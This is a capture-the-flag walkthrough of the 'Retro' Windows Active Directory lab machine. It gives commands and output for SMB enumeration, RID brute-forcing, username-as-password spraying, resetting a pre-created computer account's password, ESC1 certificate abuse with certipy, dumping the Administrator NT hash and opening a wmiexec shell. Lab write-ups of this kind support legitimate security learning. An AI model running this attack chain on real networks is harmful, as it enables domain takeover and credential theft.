Overview
- Retro (Solo, Windows)
- Junior Level Windows Active Directory Machine
- You will learn about pre-created computer accounts & ADCS
Root
Look into pre-created computer accounts (https://www.trustedsec.com/blog/diving-into-pre-created-computer-accounts/)
Enumerate certificate templates
Nmap Scan
I first scanned it normally with nmap. But it was protected by tcpwrapped.
$ nmap -sC -sV -p- -Pn --min-rate 5000 10.10.109.6
...
PORT STATE SERVICE VERSION
53/tcp open tcpwrapped
135/tcp open tcpwrapped
139/tcp open tcpwrapped
445/tcp open tcpwrapped
593/tcp open tcpwrapped
636/tcp open tcpwrapped
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2023-07-23T21:06:31
|_Not valid after: 2024-07-22T21:06:31
3389/tcp open tcpwrapped
| ssl-cert: Subject: commonName=DC.retro.vl
| Not valid before: 2023-07-25T09:53:42
|_Not valid after: 2024-01-24T09:53:42
|_ssl-date: 2023-11-01T10:25:42+00:00; -1s from scanner time.
49673/tcp open tcpwrapped
49715/tcp open unknown
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-11-01T10:25:09
|_ start_date: N/A
...I tried nmap tcpwrapped bypass scan. It worked and the service appeared.
I was able to get results that I was satisfied with.
$ nmap -n -vv -A --min-parallelism=50 --max-parallelism=150 --min-rate 5000 -Pn -T2 10.10.109.6
...
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2023-11-01 10:40:59Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Issuer: commonName=retro-DC-CA/domainComponent=retro
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-07-23T21:06:31
| Not valid after: 2024-07-22T21:06:31
| MD5: c1f0:bac7:16e0:71c2:bcb9:4327:3d56:9612
| SHA-1: 7f37:ea69:6598:2430:f918:0a65:bcad:de76:add6:fea6
| -----BEGIN CERTIFICATE-----
...
|_-----END CERTIFICATE-----
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Issuer: commonName=retro-DC-CA/domainComponent=retro
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-07-23T21:06:31
| Not valid after: 2024-07-22T21:06:31
| MD5: c1f0:bac7:16e0:71c2:bcb9:4327:3d56:9612
| SHA-1: 7f37:ea69:6598:2430:f918:0a65:bcad:de76:add6:fea6
| -----BEGIN CERTIFICATE-----
...
|_-----END CERTIFICATE-----
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Issuer: commonName=retro-DC-CA/domainComponent=retro
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-07-23T21:06:31
| Not valid after: 2024-07-22T21:06:31
| MD5: c1f0:bac7:16e0:71c2:bcb9:4327:3d56:9612
| SHA-1: 7f37:ea69:6598:2430:f918:0a65:bcad:de76:add6:fea6
| -----BEGIN CERTIFICATE-----
...
|_-----END CERTIFICATE-----
3269/tcp open ssl/ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Issuer: commonName=retro-DC-CA/domainComponent=retro
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-07-23T21:06:31
| Not valid after: 2024-07-22T21:06:31
| MD5: c1f0:bac7:16e0:71c2:bcb9:4327:3d56:9612
| SHA-1: 7f37:ea69:6598:2430:f918:0a65:bcad:de76:add6:fea6
| -----BEGIN CERTIFICATE-----
...
|_-----END CERTIFICATE-----
3389/tcp open ms-wbt-server syn-ack Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: RETRO
| NetBIOS_Domain_Name: RETRO
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: retro.vl
| DNS_Computer_Name: DC.retro.vl
| Product_Version: 10.0.20348
|_ System_Time: 2023-11-01T10:41:44+00:00
| ssl-cert: Subject: commonName=DC.retro.vl
| Issuer: commonName=DC.retro.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-07-25T09:53:42
| Not valid after: 2024-01-24T09:53:42
| MD5: 89cc:bcee:0485:b170:bbd1:ebee:3de9:3784
| SHA-1: 2bfc:a683:288b:c59e:2d2f:9ffe:0177:5d87:1c8c:272d
| -----BEGIN CERTIFICATE-----
...
|_-----END CERTIFICATE-----
|_ssl-date: 2023-11-01T10:42:23+00:00; 0s from scanner time.
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 2508/tcp): CLEAN (Timeout)
| Check 2 (port 55949/tcp): CLEAN (Timeout)
| Check 3 (port 26193/udp): CLEAN (Timeout)
| Check 4 (port 63552/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
| smb2-time:
| date: 2023-11-01T10:41:46
|_ start_date: N/ASMB – No Password
Anyway I looked at SMB share first.
$ smbclient -L 10.10.109.6
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Notes Disk
SYSVOL Disk Logon server share
Trainees Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.109.6 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
Trainees were allowed to read without credentials.
$ smbclient //10.10.109.6/Trainees -N
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Jul 23 17:58:43 2023
.. DHS 0 Wed Jul 26 05:54:14 2023
Important.txt A 288 Sun Jul 23 18:00:13 2023
6261499 blocks of size 4096. 2851529 blocks available
smb: \> get Important.txt
getting file \Important.txt of size 288 as Important.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \>Important.txt contains something very interesting. I honestly laughed when I saw the message “Please. We have other stuff to do than resetting your password every day.”
I thought they change their password every day with a strong one.
$ cat Important.txt
Dear Trainees,
I know that some of you seemed to struggle with remembering strong and unique passwords.
So we decided to bundle every one of you up into one account.
Stop bothering us. Please. We have other stuff to do than resetting your password every day.
Regards
The AdminsSMB – RID Brute Force
I can assume that the Admins are struggling with strong passwords and have assigned everyone one account and set a simple password.
I used crackmapexec to brute force the RID.
$ crackmapexec smb 10.10.109.6 -u "user" -p "" --rid-brute
SMB 10.10.109.6 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.10.109.6 445 DC [+] retro.vl\user:
SMB 10.10.109.6 445 DC [+] Brute forcing RIDs
SMB 10.10.109.6 445 DC 498: RETRO\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.109.6 445 DC 500: RETRO\Administrator (SidTypeUser)
SMB 10.10.109.6 445 DC 501: RETRO\Guest (SidTypeUser)
SMB 10.10.109.6 445 DC 502: RETRO\krbtgt (SidTypeUser)
SMB 10.10.109.6 445 DC 512: RETRO\Domain Admins (SidTypeGroup)
SMB 10.10.109.6 445 DC 513: RETRO\Domain Users (SidTypeGroup)
SMB 10.10.109.6 445 DC 514: RETRO\Domain Guests (SidTypeGroup)
SMB 10.10.109.6 445 DC 515: RETRO\Domain Computers (SidTypeGroup)
SMB 10.10.109.6 445 DC 516: RETRO\Domain Controllers (SidTypeGroup)
SMB 10.10.109.6 445 DC 517: RETRO\Cert Publishers (SidTypeAlias)
SMB 10.10.109.6 445 DC 518: RETRO\Schema Admins (SidTypeGroup)
SMB 10.10.109.6 445 DC 519: RETRO\Enterprise Admins (SidTypeGroup)
SMB 10.10.109.6 445 DC 520: RETRO\Group Policy Creator Owners (SidTypeGroup)
SMB 10.10.109.6 445 DC 521: RETRO\Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.109.6 445 DC 522: RETRO\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.10.109.6 445 DC 525: RETRO\Protected Users (SidTypeGroup)
SMB 10.10.109.6 445 DC 526: RETRO\Key Admins (SidTypeGroup)
SMB 10.10.109.6 445 DC 527: RETRO\Enterprise Key Admins (SidTypeGroup)
SMB 10.10.109.6 445 DC 553: RETRO\RAS and IAS Servers (SidTypeAlias)
SMB 10.10.109.6 445 DC 571: RETRO\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.10.109.6 445 DC 572: RETRO\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.10.109.6 445 DC 1000: RETRO\DC$ (SidTypeUser)
SMB 10.10.109.6 445 DC 1101: RETRO\DnsAdmins (SidTypeAlias)
SMB 10.10.109.6 445 DC 1102: RETRO\DnsUpdateProxy (SidTypeGroup)
SMB 10.10.109.6 445 DC 1104: RETRO\trainee (SidTypeUser)
SMB 10.10.109.6 445 DC 1106: RETRO\BANKING$ (SidTypeUser)
SMB 10.10.109.6 445 DC 1107: RETRO\jburley (SidTypeUser)
SMB 10.10.109.6 445 DC 1108: RETRO\HelpDesk (SidTypeGroup)
SMB 10.10.109.6 445 DC 1109: RETRO\tblack (SidTypeUser)Among these, the following list is likely to be useful as a user. Save as user.txt.
$ cat user.txt
trainee
BANKING$
jburley
HelpDesk
tblackIt is likely that Admin has set a simple password for the above user. First of all, what we think of as a simple password is that the username and password are the same.
Failing that, we should try rockyou.txt or SecLists password list.
$ crackmapexec smb 10.10.109.6 -u user.txt -p user.txt
SMB 10.10.109.6 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.10.109.6 445 DC [+] retro.vl\trainee:traineeTurns out that the user “trainee” uses a simple password, and the username and password are the same.
I looked around to see if there was anything I could view using these credentials.
$ crackmapexec smb 10.10.109.6 -u "trainee" -p "trainee" --shares
SMB 10.10.109.6 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.10.109.6 445 DC [+] retro.vl\trainee:trainee
SMB 10.10.109.6 445 DC [+] Enumerated shares
SMB 10.10.109.6 445 DC Share Permissions Remark
SMB 10.10.109.6 445 DC ----- ----------- ------
SMB 10.10.109.6 445 DC ADMIN$ Remote Admin
SMB 10.10.109.6 445 DC C$ Default share
SMB 10.10.109.6 445 DC IPC$ READ Remote IPC
SMB 10.10.109.6 445 DC NETLOGON READ Logon server share
SMB 10.10.109.6 445 DC Notes READ
SMB 10.10.109.6 445 DC SYSVOL READ Logon server share
SMB 10.10.109.6 445 DC Trainees READI found the smb share directory “Notes” interesting.
$ smbclient //10.10.109.6/Notes -U trainee%trainee
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Jul 23 18:03:16 2023
.. DHS 0 Wed Jul 26 05:54:14 2023
ToDo.txt A 248 Sun Jul 23 18:05:56 2023
6261499 blocks of size 4096. 2849597 blocks available
smb: \> get ToDo.txt
getting file \ToDo.txt of size 248 as ToDo.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)Todo.txt was written about pre-created computer accounts.
$ cat ToDo.txt
Thomas,
after convincing the finance department to get rid of their ancienct banking software
it is finally time to clean up the mess they made. We should start with the pre created
computer account. That one is older than me.
Best
JamesWe were previously provided with a blog post that exploits pre-created computer accounts as a tip.
I worked a lot with OS deployment and automation. One thing you start to learn when you do a lot of setups with Remote Installation Services or Windows Deployment Services is that when you pre-create computer accounts with the Assign this computer account as a pre-Windows 2000 computer checkmark, the password for the computer account becomes the same as the computer account in lowercase. For instance, the computer account DavesLaptop$ would have the password daveslaptop.
In other words, accounts created as pre-created computer accounts are likely to be set in lowercase letters, such as the password “daveslaptop” for “DavesLaptop$”, and remain that way.
The user account listed above that is considered to be a pre-created computer account is “BANKING$”.
$ crackmapexec smb 10.10.124.179 -u "BANKING\$" -p "banking"
SMB 10.10.124.179 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.10.124.179 445 DC [-] retro.vl\BANKING$:banking STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNTHow do we test to find a valid password? When I did this on the engagement, I simply used Impacket’s smbclient.py script to authenticate to a target computer account. You will see the error message STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT when you have guessed the correct password for a computer account that has not been used yet. The same error can also be seen with other tools such as CrackMapExec.
If this blog post correct, I was able to guess the correct password for a computer account that was not yet in use.
I didn’t read the article carefully, so first I tried to change the password remotely using smbpasswd. It failed.
$ smbpasswd -r 10.10.124.179 -U "BANKING\$"
Old SMB password:
New SMB password:
Retype new SMB password:
Could not connect to machine 10.10.124.179: NT_STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNTWhen I read the article carefully, it said that the password cannot be changed from SMB.
You cannot change the password over SMB (based on my research). This is due to the fact that you need to authenticate to the IPC$ share, and our identified computer account cannot be a pre-created computer account that has not had its password changed.
A solution was also provided in detail.
When I was looking in to this on my engagement, I was not aware of the Kpasswd method, so I instead ended up writing a custom Impacket script (rpcchangepwd.py) that leverages MS-RPC (port 135+high dynamic port) to change the password. This bypasses the error you get when doing it over SMB. The code is based on the smbpasswd and other Impacket scripts. I have created a pull request that can be found here for now. Hopefully it will be included in the main repo at some point.
When I looked at the Pull request mentioned, it seems that it was added to changepasswd.py.
$ impacket-changepasswd "retro.vl/BANKING\$":banking@10.10.124.179 -newpass Password1 -dc-ip 10.10.124.179 -p rpc-samr
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Changing the password of retro.vl\BANKING$
[*] Connecting to DCE/RPC as retro.vl\BANKING$
[*] Password was changed successfully.When I submitted a password change request using the article and the help of impacket-changepasswd, it was displayed as successful.
ADCS Attacks
The next thing we can do is check to see if retro.vl is using Active Directory Certificate Services. It is convenient to use certipy.
First, I started by listing the basic templates listed on the vulnlab wiki.
$ certipy find -u "BANKING$"@retro.vl -p Password1 -dc-ip 10.10.66.83 -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[+] Authenticating to LDAP server
[+] Bound to ldaps://10.10.66.83:636 - ssl
[+] Default path: DC=retro,DC=vl
[+] Configuration path: CN=Configuration,DC=retro,DC=vl
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[+] Trying to resolve 'DC.retro.vl' at '10.10.66.83'
[*] Trying to get CA configuration for 'retro-DC-CA' via CSRA
[+] Trying to get DCOM connection for: 10.10.66.83
[!] Got error while trying to get CA configuration for 'retro-DC-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'retro-DC-CA' via RRP
[+] Connected to remote registry at 'DC.retro.vl' (10.10.66.83)
[*] Got CA configuration for 'retro-DC-CA'
[+] Resolved 'DC.retro.vl' from cache: 10.10.66.83
[+] Connecting to 10.10.66.83:80
[*] Saved BloodHound data to '20231102094259_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[+] Adding Domain Computers to list of current user's SIDs
[*] Saved text output to '20231102094259_Certipy.txt'
[*] Saved JSON output to '20231102094259_Certipy.json'While looking at the results, I found a vulnerable template that could be used for privilege escalation within the domain.
I focused my search on vulnerable templates.
$ certipy find -vulnerable -u "BANKING$"@retro.vl -p Password1 -dc-ip 10.10.66.83 -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[+] Authenticating to LDAP server
[+] Bound to ldaps://10.10.66.83:636 - ssl
[+] Default path: DC=retro,DC=vl
[+] Configuration path: CN=Configuration,DC=retro,DC=vl
[+] Adding Domain Computers to list of current user's SIDs
[+] List of current user's SIDs:
RETRO.VL\Domain Computers (S-1-5-21-2983547755-698260136-4283918172-515)
RETRO.VL\Users (RETRO.VL-S-1-5-32-545)
RETRO.VL\Everyone (RETRO.VL-S-1-1-0)
RETRO.VL\Authenticated Users (RETRO.VL-S-1-5-11)
RETRO.VL\banking (S-1-5-21-2983547755-698260136-4283918172-1106)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[+] Trying to resolve 'DC.retro.vl' at '10.10.66.83'
[*] Trying to get CA configuration for 'retro-DC-CA' via CSRA
[+] Trying to get DCOM connection for: 10.10.66.83
[!] Got error while trying to get CA configuration for 'retro-DC-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'retro-DC-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[+] Connected to remote registry at 'DC.retro.vl' (10.10.66.83)
[*] Got CA configuration for 'retro-DC-CA'
[+] Resolved 'DC.retro.vl' from cache: 10.10.66.83
[+] Connecting to 10.10.66.83:80
[*] Saved BloodHound data to '20231102112955_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[*] Saved text output to '20231102112955_Certipy.txt'
[*] Saved JSON output to '20231102112955_Certipy.json'I found out that RetroClients is vulnerable to ESC1, and found out information such as Template Name and Certificate Authorities.
$ cat 20231102112955_Certipy.txt
Certificate Authorities
0
CA Name : retro-DC-CA
DNS Name : DC.retro.vl
Certificate Subject : CN=retro-DC-CA, DC=retro, DC=vl
Certificate Serial Number : 7A107F4C115097984B35539AA62E5C85
Certificate Validity Start : 2023-07-23 21:03:51+00:00
Certificate Validity End : 2028-07-23 21:13:50+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : RETRO.VL\Administrators
Access Rights
ManageCertificates : RETRO.VL\Administrators
RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
ManageCa : RETRO.VL\Administrators
RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
Enroll : RETRO.VL\Authenticated Users
Certificate Templates
0
Template Name : RetroClients
Display Name : Retro Clients
Certificate Authorities : retro-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : None
Private Key Flag : 16842752
Extended Key Usage : Client Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 1 year
Renewal Period : 6 weeks
Minimum RSA Key Length : 4096
Permissions
Enrollment Permissions
Enrollment Rights : RETRO.VL\Domain Admins
RETRO.VL\Domain Computers
RETRO.VL\Enterprise Admins
Object Control Permissions
Owner : RETRO.VL\Administrator
Write Owner Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
RETRO.VL\Administrator
Write Dacl Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
RETRO.VL\Administrator
Write Property Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
RETRO.VL\Administrator
[!] Vulnerabilities
ESC1 : 'RETRO.VL\\Domain Computers' can enroll, enrollee supplies subject and template allows client authenticationESC1 – Use ability to enroll as a normal user & provide a user defined subject alternative name
For now, I tried requesting it according to the template written in the vulnlab wiki and Certipy’s README.md.
$ certipy req -username "BANKING\$"@retro.vl -p Password1 -target dc.retro.vl -ca retro-DC-CA -template RetroClients -upn administrator@retro.vl -dc-ip 10.10.81.117 -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[+] Trying to resolve 'dc.retro.vl' at '10.10.81.117'
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:10.10.81.117[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.10.81.117[\pipe\cert]
[-] Got error while trying to request certificate: code: 0x80094811 - CERTSRV_E_KEY_LENGTH - The public key does not meet the minimum size required by the specified certificate template.
[*] Request ID is 8
Would you like to save the private key? (y/N) y
[*] Saved private key to 8.key
[-] Failed to request certificateThe above command successfully saves the privatekey, but an error occurs regarding the minimum size. To solve this problem, just add “-key-size 4096” to the option.
$ certipy req -username "BANKING\$"@retro.vl -password Password1 -target dc.retro.vl -ca retro-DC-CA -template RetroClients -upn administrator@retro.vl -dc-ip 10.10.81.117 -key-size 4096 -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[+] Trying to resolve 'dc.retro.vl' at '10.10.81.117'
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:10.10.81.117[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.10.81.117[\pipe\cert]
[*] Successfully requested certificate
[*] Request ID is 10
[*] Got certificate with UPN 'administrator@retro.vl'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'I was able to save the Administrator’s ticket and get the NT hash as well.
$ certipy auth -pfx administrator.pfx -dc-ip 10.10.81.117
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@retro.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@retro.vl': aad3b435b51404eeaad3b435b51404ee:252fac7066d93dd009d4fd2cd0368389The following cheat sheet describes how to create a shell using impacket by exploiting tickets.
I couldn’t tell the difference between “impacket-psexec”, “impacket-smbexec” and “impacket-wmiexec”, so I tried them all. As a result, I was able to get a shell by using “impacket-wmiexec”.
As a result, I got the Administrator shell and got the root flag.
export KRB5CCNAME=administrator.ccache
$ impacket-wmiexec retro.vl/Administrator@dc.retro.vl -k -no-pass -dc-ip 10.10.81.117
Impacket v0.11.0 - Copyright 2023 Fortra
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
retro\administrator
C:\>type C:\Users\Administrator\Desktop\root.txt
VL{<REDACTED>}Thoughts
ADCS Attacks is the basic of basics, but it took me a long time to solve it because I didn’t have enough knowledge. I wanted to learn this kind of basic privilege escalation as a foundation.
I encountered a similar problem a few weeks ago, but I was only solving the problem, not learning. I will reflect.
Reference
Walkthroughs
Comments